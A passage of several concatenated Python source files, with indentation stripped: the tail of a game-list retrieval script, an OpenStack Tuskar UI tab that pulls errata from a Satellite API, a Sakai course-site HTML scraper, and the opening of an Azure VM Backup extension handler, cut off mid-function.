"GameContentType", "SkuId", "GamePost", "NormalizedName"]
records = []
start_position = 0
while True:
temp_url = url.format(__PAGE_SIZE, start_position)
status_code, json_data = check_url(temp_url)
if status_code != HTTPStatus.OK:
raise Exception("Retrieve data failed at position {0}.".format(start_position))
temp_records, raw_count = parse_data(json_data)
records.extend(temp_records)
print("Position {0}: Retrieved records = {1}".format(start_position, len(temp_records)))
if raw_count < __PAGE_SIZE:
break
start_position += __PAGE_SIZE
print("Total records =", len(records))
print("-" * 100)
# If given __output_file_path, output to file; otherwise, output to
# screen.
if __output_file_path:
if len(records) == 0:
raise Exception("No data retrieved.")
try:
# Open output file.
with open(__output_file_path, "wt", encoding = "utf-8") as output_file:
print('output_file =', output_file)
# Output file as CSV format.
cout = csv.writer(output_file, lineterminator = "\n")
# Write header line.
cout.writerow(headers)
# Write record lines.
cout.writerows(records)
print("Output process results: ok")
except Exception as e:
print("Output process results: Exception = {0}".format(e))
else:
# Output screen as JSON format.
print("headers =", headers)
print("records =")
for record in records:
print(record)
time_str = strftime("%Y-%m-%d %H:%M:%S", localtime(time()))
print("Stop time =", time_str)
def usage():
print('''
Retrieve game list.
Usage:
-h
-d <DataType> [-o <file path>]
Options:
-h : Show help.
-d <DataType> : Data type. Compulsory, Value [0: All, 1: PS4 only].
-o <file path> : Result output file path (CSV). Optional, output to screen by default.
''')
def main(argv):
'''
Pass input arguments from command line to method.
@param argv: A list of arguments
'''
global __data_type
global __output_file_path
print("argv =", argv)
__show_usage = False
__exit_code = 0
__error_message = None
# If no any option.
if not argv:
__show_usage = True
# Parse command line.
if not __show_usage:
try:
opts, args = getopt.getopt(argv, "hd:o:")
print("opts =", opts)
print("args =", args)
except Exception as e:
# There would be getopt.GetoptError.
print("Parse command line: Exception = {0}".format(e))
__show_usage, __exit_code, __error_message = True, -1, "Wrong command line option."
# Check and parse each option.
if not __show_usage:
try:
for opt, arg in opts:
if opt == "-h":
__show_usage, __exit_code = True, 0
elif opt == "-d":
__data_type = int(arg)
elif opt == "-o":
__output_file_path = arg
else:
__show_usage, __exit_code, __error_message = True, -\
2, "Unknown command line option."
except Exception as e:
print("Parse command options: Exception = {0}".format(e))
__show_usage, __exit_code, __error_message = True, -\
3, "Wrong value for command line option."
print("show_usage =", __show_usage)
print("data_type =", __data_type)
print("output_file_path", __output_file_path)
# Check options are valid.
if not __show_usage:
if (__data_type is None):
__show_usage, __exit_code, __error_message = True, -\
4, "Missing compulsory command line option."
elif (__data_type < 0) or (__data_type > 1):
__show_usage, __exit_code, __error_message = True, -5, "Wrong value for -d."
if not __show_usage:
process()
else:
print("__exit_code =", __exit_code)
if __error_message:
print("__error_message =", __error_message)
print("")
usage()
sys.exit(__exit_code)
if __name__ == '__main__':
main(sys.argv[1:])
|
|
# -*- coding: utf8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import logging
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
import horizon.messages
from horizon import tabs
import requests
import requests_oauthlib
from tuskar_ui import api
from tuskar_ui.infrastructure.nodes import tabs as nodes_tabs
from tuskar_sat_ui.nodes import tables
SAT_HOST_PARAM = 'satellite_host'
SAT_API_PARAM = 'satellite_api'
SAT_AUTH_PARAM = 'satellite_auth'
SAT_ORG_PARAM = 'satellite_org'
SAT_CONFIG = 'SATELLITE_CONFIG'
VERIFY_SSL = not getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
LOG = logging.getLogger('tuskar_sat_ui')
ErrataItem = collections.namedtuple('ErrataItem', [
'title',
'type',
'id',
'host_id',
'issued',
'admin_url',
])
class Error(Exception):
pass
class NoConfigError(Error):
"""Failed to find the Satellite configuration in Heat parameters."""
def __init__(self, param=None, *args, **kwargs):
super(NoConfigError, self).__init__(*args, **kwargs)
self.param = param
class NodeNotFound(Error):
"""Failed to find the Satellite node."""
class BadAuthError(Error):
"""Unknown authentication method for Satellite."""
def __init__(self, auth=None, *args, **kwargs):
super(BadAuthError, self).__init__(*args, **kwargs)
self.auth = auth
class NoErrataError(Error):
"""There is no errata for that node."""
def _get_satellite_config():
"""Find the Satellite configuration data.
The configuration data is store in Heat as parameters. They may be
stored directly as Heat parameters, or in a the JSON structure stored
in ExtraConfig.
"""
try:
config = getattr(settings, SAT_CONFIG)
except AttributeError:
raise NoConfigError(SAT_CONFIG, 'Parameter %r missing.' % SAT_CONFIG)
for param in [SAT_HOST_PARAM, SAT_AUTH_PARAM, SAT_ORG_PARAM]:
if param not in config:
raise NoConfigError(param, 'Parameter %r missing.' % param)
admin_url = config[SAT_HOST_PARAM]
# Get rid of any trailing slash in the admin url
admin_url = admin_url.strip('/')
try:
auth = config[SAT_AUTH_PARAM].split(':', 2)
except ValueError:
raise BadAuthError(auth=config[SAT_AUTH_PARAM])
if auth[0] == 'oauth':
auth = requests_oauthlib.OAuth1(auth[1], auth[2])
elif auth[0] == 'basic':
auth = auth[1], auth[2]
else:
raise BadAuthError(auth=auth[0])
organization = config[SAT_ORG_PARAM]
if SAT_API_PARAM in config:
api_url = config[SAT_API_PARAM]
# Get rid of any trailing slash in the API url
api_url = api_url.strip('/')
else:
api_url = admin_url
return admin_url, api_url, auth, organization
def _get_stack(request):
"""Find the stack."""
# TODO(rdopiera) We probably should use the StackMixin instead.
try:
plan = api.tuskar.Plan.get_the_plan(request)
stack = api.heat.Stack.get_by_plan(request, plan)
except Exception as e:
LOG.exception(e)
horizon.messages.error(request, _("Could not retrieve errata."))
return None
return stack
def _find_uuid_by_mac(api_url, auth, organization, addresses):
"""Pick up the UUID from the MAC address.
This makes no sense, as we need both MAC address and the interface, and
we don't have the interface, so we need to make multiple slow searches.
If the Satellite UUID isn't the same as this one, and it probably
isn't, we need to store a mapping somewhere.
"""
url = '{api_url}/katello/api/v2/systems'.format(api_url=api_url)
for mac in addresses:
for interface in ['eth0', 'eth1', 'en0', 'en1']:
q = 'facts.net.interface.{iface}.mac_address:"{mac}"'.format(
iface=interface, mac=mac.upper())
params = {'search': q, 'organization_id': organization}
r = requests.get(url, params=params, auth=auth,
verify=VERIFY_SSL)
r.raise_for_status() # Raise an error if the request failed
contexts = r.json()['results']
if contexts:
return contexts[0]['uuid']
raise NodeNotFound()
def _get_errata_data(admin_url, api_url, auth, uuid):
"""Get the errata here, while it's hot."""
url = '{url}/katello/api/v2/systems/{id}/errata'.format(url=api_url,
id=uuid)
r = requests.get(url, auth=auth, verify=VERIFY_SSL)
r.raise_for_status() # Raise an error if the request failed
errata = r.json()['results']
if not errata:
raise NoErrataError()
data = [ErrataItem(x['title'], x['type'], x['errata_id'], uuid,
x['issued'], admin_url) for x in errata]
return data
class DetailOverviewTab(nodes_tabs.DetailOverviewTab):
template_name = 'infrastructure/nodes/_detail_overview_sat.html'
def get_context_data(self, request, **kwargs):
context = super(DetailOverviewTab,
self).get_context_data(request, **kwargs)
if context['node'].uuid is None:
return context
try:
admin_url, api_url, auth, organization = _get_satellite_config()
except NoConfigError as e:
horizon.messages.error(request, _(
"No Satellite configuration found. "
"Missing parameter %r."
) % e.param)
return context
except BadAuthError as e:
horizon.messages.error(request, _(
"Satellite configuration error, "
"unknown authentication method %r."
) % e.auth)
return context
addresses = context['node'].addresses
try:
uuid = _find_uuid_by_mac(api_url, auth, organization, addresses)
except NodeNotFound:
return context
# TODO(rdopiera) Should probably catch that requests exception here.
try:
data = _get_errata_data(admin_url, api_url, auth, uuid)
except NoErrataError:
return context
context['errata'] = tables.ErrataTable(request, data=data)
return context
class NodeDetailTabs(tabs.TabGroup):
slug = "node_details"
tabs = (DetailOverviewTab,)
|
|
from copy import deepcopy
import HTMLParser
import re
try:
from BeautifulSoup import BeautifulSoup as soup
BS_AVAILABLE = True
except ImportError:
print "WARNING - BS4 NOT AVAILABLE"
BS_AVAILABLE = False
class HTMLScraperInterface(object):
def get_iframes(self, html_in):
raise NotImplementedError('Subclasses of HTMLScraperInterface should override this method')
def get_tools(self, html_in):
raise NotImplementedError('Subclasses of HTMLScraperInterface should override this method')
def get_assignments(self, html_in):
raise NotImplementedError('Subclasses of HTMLScraperInterface should override this method')
def get_grades(self, html_in):
raise NotImplementedError('Subclasses of HTMLScraperInterface should override this method')
class LXMLParser(HTMLScraperInterface):
def get_iframes(self, html_in):
doc = soup(html_in)
frame_attrs = dict(doc.iframe.attrs)
return [{'name' : frame_attrs['name'],
'title': frame_attrs['title'],
'src' : frame_attrs['src'] }]
def get_tools(self, html_in):
doc = soup(html_in)
out_dict_list = []
for tab in doc.findAll('a'):
class_type = tab.get('class')
if class_type and re.match('icon-sakai-*', class_type):
out_dict_list.append({'name': tab.get('class')[11:].strip(),
'href': tab.get('href'),
'desc': tab.get('title')})
return out_dict_list
def get_assignments(self, html_in):
doc = soup(html_in)
out_list = []
table = doc.table
for i, table_row in enumerate(table('tr')):
if i == 0:
# skip the table header row
pass
else:
temp_obj = { 'href' : table_row.a['href'] }
for table_col in table_row('td'):
header = table_col.get('headers')
if header is not None:
temp_obj[header] = table_col.text.strip()
out_list.append(temp_obj)
return out_list
def get_grades(self, html_in):
doc = soup(html_in)
out_dict = {}
tables = doc.findAll('table')
# tables[0] is the header that we don't care about
# tables[1] is the course grade
course_grade_table = tables[1]
if tables[1].span:
out_dict['course_grade'] = { 'letter_grade': tables[1].span.text,
'number_grade': tables[1]('span')[1].text }
else:
out_dict['course_grade'] = { 'error' : 'Not yet available'}
out_dict['grades'] = {}
# tables[2] is a bunch of javascript and all of the grade data.
# first we have to strip away the javascript.
row_data = [x for x in tables[2]('td')]
_NEXT_FIELD = 'name'
_CURRENT_CATEGORY = ''
_temp = {}
for row in row_data:
if row.img:
# this is the first row of the table
continue
if row.span:
# this is a category
_CURRENT_CATEGORY = row.span.text.strip()
if not _CURRENT_CATEGORY in out_dict['grades']:
out_dict['grades'][_CURRENT_CATEGORY] = []
elif row.get('class') == 'left' and _NEXT_FIELD == 'name':
# this is a grade name
_temp['name'] = row.text
_NEXT_FIELD = 'date'
elif _NEXT_FIELD == 'date':
_temp['date'] = row.text
_NEXT_FIELD = 'grade'
elif _NEXT_FIELD == 'grade':
_temp['grade'] = row.text
_NEXT_FIELD = 'comments'
elif _NEXT_FIELD == 'comments':
_temp['comments'] = row.text
_NEXT_FIELD = 'attachment'
elif _NEXT_FIELD == 'attachment':
# ignore this for now
_NEXT_FIELD = 'name'
if _CURRENT_CATEGORY == '':
if not 'unnamed' in out_dict['grades']:
out_dict['grades']['unnamed'] = []
out_dict['grades']['unnamed'].append(_temp)
_temp = {}
else:
out_dict['grades'][_CURRENT_CATEGORY].append(_temp)
_temp = {}
return out_dict
def get_syllabus(self, html_in):
soup_html = soup(html_in)
table = soup_html('table')
html = table.__repr__()[1:-1] # SERIOUSLY beautifulsoup????
return html
class DefaultParser(HTMLScraperInterface):
def get_iframes(self, html_in):
return _IFrameParser().get_iframes(html_in)
def get_tools(self, html_in):
return _SiteToolHTMLParser().get_tools(html_in)
def get_assignments(self, html_in):
return _AssignmentHTMLParser().get_assignments(html_in)
class _IFrameParser(HTMLParser.HTMLParser):
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
self._iframes = []
def handle_starttag(self, tag, attrs):
first_attr = dict(attrs)
if tag == 'iframe':
self._iframes.append({ 'name' : first_attr['name'],
'title': first_attr['title'].strip(),
'src' : first_attr['src']})
def get_iframes(self, html_input):
self.feed(html_input)
return self._iframes
class _SiteToolHTMLParser(HTMLParser.HTMLParser):
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
self._tools = []
def handle_starttag(self, tag, attrs):
first_attr = dict(attrs)
# if this is a link with a class attribute
if tag == 'a' and 'class' in first_attr:
# look for tools
if first_attr['class'].strip() == 'icon-sakai-syllabus':
self._tools.append({ 'name': 'syllabus',
'href': first_attr['href'],
'desc': first_attr['title']})
elif first_attr['class'].strip() == 'icon-sakai-resources':
self._tools.append({ 'name': 'resources',
'href': first_attr['href'],
'desc': first_attr['title']})
elif first_attr['class'].strip() == 'icon-sakai-assignment-grades':
self._tools.append({ 'name': 'assignments',
'href': first_attr['href'],
'desc': first_attr['title']})
elif first_attr['class'].strip() == 'icon-sakai-gradebook-tool':
self._tools.append({ 'name': 'grades',
'href': first_attr['href'],
'desc': first_attr['title']})
def get_tools(self, html_text):
self.feed(html_text)
return self._tools
def purge(self):
self._tools = []
class _AssignmentHTMLParser(HTMLParser.HTMLParser):
_PARSER_STATE = ['WAITING_FOR_H4',
'WAITING_FOR_LINK'
'WAITING_FOR_STATUS',
'WAITING_FOR_OPEN_DATE',
'WAITING_FOR_DUE_DATE']
_LEXER_STATE = ['STARTING_STATE',
'NEXT_IS_TITLE',
'NEXT_IS_STATUS',
'NEXT_IS_OPEN_DATE',
'NEXT_IS_DUE_DATE']
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
self._assignments = []
self._state = 'WAITING_FOR_H4'
self._lstate = 'STARTING_STATE'
self._constructed_obj = {}
def _assert_state(self, desired_state, desired_lstate):
return self._state == desired_state and self._lstate == desired_lstate
def handle_starttag(self, tag, attr):
first_attr = dict(attr)
if tag == 'h4':
# this is an assignment name
if self._assert_state('WAITING_FOR_H4', 'STARTING_STATE'):
self._state = 'WAITING_FOR_LINK'
elif tag == 'a':
# this is a link
if self._assert_state('WAITING_FOR_LINK', 'STARTING_STATE'):
self._constructed_obj['href'] = first_attr['href']
self._state = 'WAITING_FOR_TITLE'
self._lstate = 'NEXT_IS_TITLE'
elif tag == 'td':
# this is a table
if 'headers' in first_attr:
if first_attr['headers'] == 'status':
self._lstate = 'NEXT_IS_STATUS'
elif first_attr['headers'] == 'openDate':
self._lstate = 'NEXT_IS_OPEN_DATE'
elif first_attr['headers'] == 'dueDate':
self._lstate = 'NEXT_IS_DUE_DATE'
def handle_data(self, data):
stripped_data = data.strip('\t\n')
if len(stripped_data) == 0:
return
if self._assert_state('WAITING_FOR_TITLE', 'NEXT_IS_TITLE'):
self._constructed_obj['title'] = stripped_data
self._state = 'WAITING_FOR_STATUS'
self._lstate = 'STARTING_STATE'
elif self._assert_state('WAITING_FOR_STATUS', 'NEXT_IS_STATUS'):
self._constructed_obj['status'] = stripped_data
self._state = 'WAITING_FOR_OPEN_DATE'
self._lstate = 'STARTING_STATE'
elif self._assert_state('WAITING_FOR_OPEN_DATE', 'NEXT_IS_OPEN_DATE'):
self._constructed_obj['openDate'] = stripped_data
self._state = 'WAITING_FOR_DUE_DATE'
self._lstate = 'STARTING_STATE'
elif self._assert_state('WAITING_FOR_DUE_DATE', 'NEXT_IS_DUE_DATE'):
self._constructed_obj['dueDate'] = stripped_data
self._assignments.append(deepcopy(self._constructed_obj))
self._constructed_obj = {}
self._state = self._PARSER_STATE[0]
self._lstate = self._LEXER_STATE[0]
def get_assignments(self, html_input):
self.feed(html_input)
return self._assignments
def purge(self):
self._assignments = []
self._constructed_obj = {}
self._state = self._PARSER_STATE[0]
REGISTERED_METHODS = { 'default' : DefaultParser,
'bs4' : LXMLParser }
|
|
#!/usr/bin/env python
#
# VM Backup extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import array
import base64
import os
import os.path
import re
import json
import string
import subprocess
import sys
import time
import shlex
import traceback
import datetime
import random
try:
import ConfigParser as ConfigParsers
except ImportError:
import configparser as ConfigParsers
from threading import Thread
from time import sleep
from os.path import join
from mounts import Mounts
from mounts import Mount
from patch import *
from fsfreezer import FsFreezer
from common import CommonVariables
from parameterparser import ParameterParser
from Utils import HandlerUtil
from Utils import SizeCalculation
from Utils import Status
from freezesnapshotter import FreezeSnapshotter
from backuplogger import Backuplogger
from blobwriter import BlobWriter
from taskidentity import TaskIdentity
from MachineIdentity import MachineIdentity
import ExtensionErrorCodeHelper
from PluginHost import PluginHost
from PluginHost import PluginHostResult
import platform
from workloadPatch import WorkloadPatch
#Main function is the only entrence to this extension handler
def main():
global MyPatching,backup_logger,hutil,run_result,run_status,error_msg,freezer,freeze_result,snapshot_info_array,total_used_size,size_calculation_failed, patch_class_name, orig_distro, configSeqNo
try:
run_result = CommonVariables.success
run_status = 'success'
error_msg = ''
freeze_result = None
snapshot_info_array = None
total_used_size = 0
size_calculation_failed = False
HandlerUtil.waagent.LoggerInit('/dev/console','/dev/stdout')
hutil = HandlerUtil.HandlerUtility(HandlerUtil.waagent.Log, HandlerUtil.waagent.Error, CommonVariables.extension_name)
backup_logger = Backuplogger(hutil)
MyPatching, patch_class_name, orig_distro = GetMyPatching(backup_logger)
hutil.patching = MyPatching
configSeqNo = -1
for a in sys.argv[1:]:
if re.match("^([-/]*)(disable)", a):
disable()
elif re.match("^([-/]*)(uninstall)", a):
uninstall()
elif re.match("^([-/]*)(install)", a):
install()
elif re.match("^([-/]*)(enable)", a):
enable()
elif re.match("^([-/]*)(update)", a):
update()
elif re.match("^([-/]*)(daemon)", a):
daemon()
elif re.match("^([-/]*)(seqNo:)", a):
try:
configSeqNo = int(a.split(':')[1])
except:
configSeqNo = -1
except Exception as e:
sys.exit(0)
def install():
global hutil,configSeqNo
hutil.do_parse_context('Install', configSeqNo)
hutil.do_exit(0, 'Install','success','0', 'Install Succeeded')
def status_report_to_file(file_report_msg):
global backup_logger,hutil
hutil.write_to_status_file(file_report_msg)
backup_logger.log("file status report message:",True)
backup_logger.log(file_report_msg,True)
def status_report_to_blob(blob_report_msg):
global backup_logger,hutil,para_parser
UploadStatusAndLog = hutil.get_strvalue_from_configfile('UploadStatusAndLog','True')
if(UploadStatusAndLog == None or UploadStatusAndLog == 'True'):
try:
if(para_parser is not None and para_parser.statusBlobUri is not None and para_parser.statusBlobUri != ""):
blobWriter = BlobWriter(hutil)
if(blob_report_msg is not None):
blobWriter.WriteBlob(blob_report_msg,para_parser.statusBlobUri)
backup_logger.log("blob status report message:",True)
backup_logger.log(blob_report_msg,True)
else:
backup_logger.log("blob_report_msg is none",True)
except Exception as e:
err_msg='cannot write status to the status blob'+traceback.format_exc()
backup_logger.log(err_msg, True, 'Warning')
def get_status_to_report(status, status_code, message, snapshot_info = None):
global MyPatching,backup_logger,hutil,para_parser,total_used_size,size_calculation_failed
blob_report_msg = None
file_report_msg = None
try:
if total_used_size == -1 :
sizeCalculation = SizeCalculation.SizeCalculation(patching = MyPatching , logger = backup_logger , para_parser = para_parser)
total_used_size,size_calculation_failed = sizeCalculation.get_total_used_size()
number_of_blobs = len(para_parser.includeLunList)
maximum_possible_size = number_of_blobs * 1099511627776
if(total_used_size>maximum_possible_size):
total_used_size = maximum_possible_size
backup_logger.log("Assertion Check, total size : {0} ,maximum_possible_size : {1}".format(total_used_size,maximum_possible_size),True)
if(para_parser is not None):
blob_report_msg, file_report_msg = hutil.do_status_report(operation='Enable',status=status,\
status_code=str(status_code),\
message=message,\
taskId=para_parser.taskId,\
commandStartTimeUTCTicks=para_parser.commandStartTimeUTCTicks,\
snapshot_info=snapshot_info,\
total_size = total_used_size,\
failure_flag = size_calculation_failed)
except Exception as e:
err_msg='cannot get status report parameters , Exception %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(err_msg, True, 'Warning')
return blob_report_msg, file_report_msg
def exit_with_commit_log(status,result,error_msg, para_parser):
global backup_logger
backup_logger.log(error_msg, True, 'Error')
if(para_parser is not None and para_parser.logsBlobUri is not None and para_parser.logsBlobUri != ""):
backup_logger.commit(para_parser.logsBlobUri)
blob_report_msg, file_report_msg = get_status_to_report(status, result, error_msg, None)
status_report_to_file(file_report_msg)
status_report_to_blob(blob_report_msg)
sys.exit(0)
def exit_if_same_taskId(taskId):
global backup_logger,hutil,para_parser
trans_report_msg = None
taskIdentity = TaskIdentity()
last_taskId = taskIdentity.stored_identity()
if(taskId == last_taskId):
backup_logger.log("TaskId is same as last, so skip with Processed Status, current:" + str(taskId) + "== last:" + str(last_taskId), True)
status=CommonVariables.status_success
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.SuccessAlreadyProcessedInput)
status_code=CommonVariables.SuccessAlreadyProcessedInput
message='TaskId AlreadyProcessed nothing to do'
backup_logger.log(message, True)
sys.exit(0)
def freeze_snapshot(timeout):
try:
global hutil,backup_logger,run_result,run_status,error_msg,freezer,freeze_result,para_parser,snapshot_info_array,g_fsfreeze_on, workload_patch
canTakeCrashConsistentSnapshot = can_take_crash_consistent_snapshot(para_parser)
freeze_snap_shotter = FreezeSnapshotter(backup_logger, hutil, freezer, g_fsfreeze_on, para_parser, canTakeCrashConsistentSnapshot)
backup_logger.log("Calling do snapshot method", True, 'Info')
run_result, run_status, snapshot_info_array = freeze_snap_shotter.doFreezeSnapshot()
if (canTakeCrashConsistentSnapshot == True and run_result != CommonVariables.success and run_result != CommonVariables.success_appconsistent):
if (snapshot_info_array is not None and snapshot_info_array !=[] and check_snapshot_array_fail() == False and len(snapshot_info_array) == 1):
run_status = CommonVariables.status_success
run_result = CommonVariables.success
hutil.SetSnapshotConsistencyType(Status.SnapshotConsistencyType.crashConsistent)
except Exception as e:
errMsg = 'Failed to do the snapshot with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
run_result = CommonVariables.error
run_status = 'error'
error_msg = 'Enable failed with exception in safe freeze or snapshot '
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error)
#snapshot_done = True
def check_snapshot_array_fail():
global snapshot_info_array, backup_logger
snapshot_array_fail = False
if snapshot_info_array is not None and snapshot_info_array !=[]:
for snapshot_index in range(len(snapshot_info_array)):
if(snapshot_info_array[snapshot_index].isSuccessful == False):
backup_logger.log('T:S snapshot failed at index ' + str(snapshot_index), True)
snapshot_array_fail = True
break
return snapshot_array_fail
def get_key_value(jsonObj, key):
value = None
if(key in jsonObj.keys()):
value = jsonObj[key]
return value
def can_take_crash_consistent_snapshot(para_parser):
global backup_logger
takeCrashConsistentSnapshot = False
if(para_parser != None and para_parser.customSettings != None and para_parser.customSettings != ''):
customSettings = json.loads(para_parser.customSettings)
isManagedVm = get_key_value(customSettings, 'isManagedVm')
canTakeCrashConsistentSnapshot = get_key_value(customSettings, 'canTakeCrashConsistentSnapshot')
backupRetryCount = get_key_value(customSettings, 'backupRetryCount')
numberOfDisks = 0
if (para_parser.includeLunList is not None):
numberOfDisks = len(para_parser.includeLunList)
isAnyNone = (isManagedVm is None or canTakeCrashConsistentSnapshot is None or backupRetryCount is None)
if (isAnyNone == False and isManagedVm == True and canTakeCrashConsistentSnapshot == True and backupRetryCount > 0 and numberOfDisks == 1):
takeCrashConsistentSnapshot = True
backup_logger.log("isManagedVm=" + str(isManagedVm) + ", canTakeCrashConsistentSnapshot=" + str(canTakeCrashConsistentSnapshot) + ", backupRetryCount=" + str(backupRetryCount) + ", numberOfDisks=" + str(numberOfDisks) + ", takeCrashConsistentSnapshot=" + str(takeCrashConsistentSnapshot), True, 'Info')
return takeCrashConsistentSnapshot
def daemon():
global MyPatching,backup_logger,hutil,run_result,run_status,error_msg,freezer,para_parser,snapshot_done,snapshot_info_array,g_fsfreeze_on,total_used_size,patch_class_name,orig_distro, workload_patch, configSeqNo
#this is using the most recent file timestamp.
hutil.do_parse_context('Executing', configSeqNo)
try:
backup_logger.log('starting daemon', True)
backup_logger.log("patch_class_name: "+str(patch_class_name)+" and orig_distro: "+str(orig_distro),True)
# handle the restoring scenario.
mi = MachineIdentity()
stored_identity = mi.stored_identity()
if(stored_identity is None):
mi.save_identity()
else:
current_identity = mi.current_identity()
if(current_identity != stored_identity):
current_seq_no = -1
backup_logger.log("machine identity not same, set current_seq_no to " + str(current_seq_no) + " " + str(stored_identity) + " " + str(current_identity), True)
hutil.set_last_seq(current_seq_no)
mi.save_identity()
except Exception as e:
errMsg = 'Failed to validate sequence number with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
freezer = FsFreezer(patching= MyPatching, logger = backup_logger, hutil = hutil)
global_error_result = None
# precheck
freeze_called = False
configfile='/etc/azure/vmbackup.conf'
thread_timeout=str(60)
OnAppFailureDoFsFreeze = True
OnAppSuccessDoFsFreeze = True
#Adding python version to the telemetry
try:
python_version_info = sys.version_info
python_version = str(sys.version_info[0])+ '.' + str(sys.version_info[1]) + '.' + str(sys.version_info[2])
HandlerUtil.HandlerUtility.add_to_telemetery_data("pythonVersion", python_version)
except Exception as e:
errMsg = 'Failed to do retrieve python version with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
#fetching platform architecture
try:
architecture = platform.architecture()[0]
HandlerUtil.HandlerUtility.add_to_telemetery_data("platformArchitecture", architecture)
except Exception as e:
errMsg = 'Failed to do retrieve "platform architecture" with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
try:
if(freezer.mounts is not None):
hutil.partitioncount = len(freezer.mounts.mounts)
backup_logger.log(" configfile " + str(configfile), True)
config = ConfigParsers.ConfigParser()
config.read(configfile)
if config.has_option('SnapshotThread','timeout'):
thread_timeout= config.get('SnapshotThread','timeout')
if config.has_option('SnapshotThread','OnAppFailureDoFsFreeze'):
OnAppFailureDoFsFreeze= config.get('SnapshotThread','OnAppFailureDoFsFreeze')
if config.has_option('SnapshotThread','OnAppSuccessDoFsFreeze'):
OnAppSuccessDoFsFreeze= config.get('SnapshotThread','OnAppSuccessDoFsFreeze')
except Exception as e:
errMsg='cannot read config file or file not present'
backup_logger.log(errMsg, True, 'Warning')
backup_logger.log("final thread timeout" + thread_timeout, True)
snapshot_info_array = None
try:
# we need to freeze the file system first
backup_logger.log('starting daemon', True)
"""
protectedSettings is the privateConfig passed from Powershell.
WATCHOUT that, the _context_config are using the most freshest timestamp.
if the time sync is alive, this should be right.
"""
protected_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('protectedSettings', {})
public_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('publicSettings')
para_parser = ParameterParser(protected_settings, public_settings, backup_logger)
hutil.update_settings_file()
if(bool(public_settings) == False and not protected_settings):
error_msg = "unable to load certificate"
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.FailedHandlerGuestAgentCertificateNotFound)
temp_result=CommonVariables.FailedHandlerGuestAgentCertificateNotFound
temp_status= 'error'
exit_with_commit_log(temp_status, temp_result,error_msg, para_parser)
if(para_parser.commandStartTimeUTCTicks is not None and para_parser.commandStartTimeUTCTicks != ""):
canTakeCrashConsistentSnapshot = can_take_crash_consistent_snapshot(para_parser)
temp_g_fsfreeze_on = True
freeze_snap_shotter = FreezeSnapshotter(backup_logger, hutil, freezer, temp_g_fsfreeze_on, para_parser, canTakeCrashConsistentSnapshot)
if freeze_snap_shotter.is_command_timedout(para_parser) :
error_msg = "CRP timeout limit has reached, will not take snapshot."
errMsg = error_msg
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.FailedGuestAgentInvokedCommandTooLate)
temp_result=CommonVariables.FailedGuestAgentInvokedCommandTooLate
temp_status= 'error'
exit_with_commit_log(temp_status, temp_result,error_msg, para_parser)
hutil.save_seq()
commandToExecute = para_parser.commandToExecute
#validate all the required parameter here
backup_logger.log(commandToExecute,True)
if(CommonVariables.iaas_install_command in commandToExecute.lower()):
backup_logger.log('install succeed.',True)
run_status = 'success'
error_msg = 'Install Succeeded'
run_result = CommonVariables.success
backup_logger.log(error_msg)
elif(CommonVariables.iaas_vmbackup_command in commandToExecute.lower()):
if(para_parser.backup_metadata is None or para_parser.public_config_obj is None):
run_result = CommonVariables.error_parameter
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error_parameter)
run_status = 'error'
error_msg = 'required field empty or not correct'
backup_logger.log(error_msg, True, 'Error')
else:
backup_logger.log('commandToExecute is ' + commandToExecute, True)
"""
make sure the log is not doing when the file system is freezed.
"""
temp_status= 'success'
temp_result=CommonVariables.ExtensionTempTerminalState
temp_msg='Transitioning state in extension'
blob_report_msg, file_report_msg = get_status_to_report(temp_status, temp_result, temp_msg, None)
status_report_to_file(file_report_msg)
status_report_to_blob(blob_report_msg)
#partial logging before freeze
if(para_parser is not None and para_parser.logsBlobUri is not None and para_parser.logsBlobUri != ""):
backup_logger.commit_to_blob(para_parser.logsBlobUri)
else:
backup_logger.log("the logs blob uri is not there, so do not upload log.")
backup_logger.log('commandToExecute is ' + commandToExecute, True)
workload_patch = WorkloadPatch.WorkloadPatch(backup_logger)
#new flow only if workload name is present in workload.conf
if workload_patch.name != None and workload_patch.name != "":
backup_logger.log("workload backup enabled for workload: " + workload_patch.name, True)
hutil.set_pre_post_enabled()
pre_skipped = False
if len(workload_patch.error_details) > 0:
backup_logger.log("skip pre and post")
pre_skipped = True
else:
workload_patch.pre()
if len(workload_patch.error_details) > 0:
backup_logger.log("file system consistent backup only")
#todo error handling
if len(workload_patch.error_details) > 0 and OnAppFailureDoFsFreeze == True: #App&FS consistency
g_fsfreeze_on = True
elif len(workload_patch.error_details) > 0 and OnAppFailureDoFsFreeze == False: # Do Fs freeze only if App success
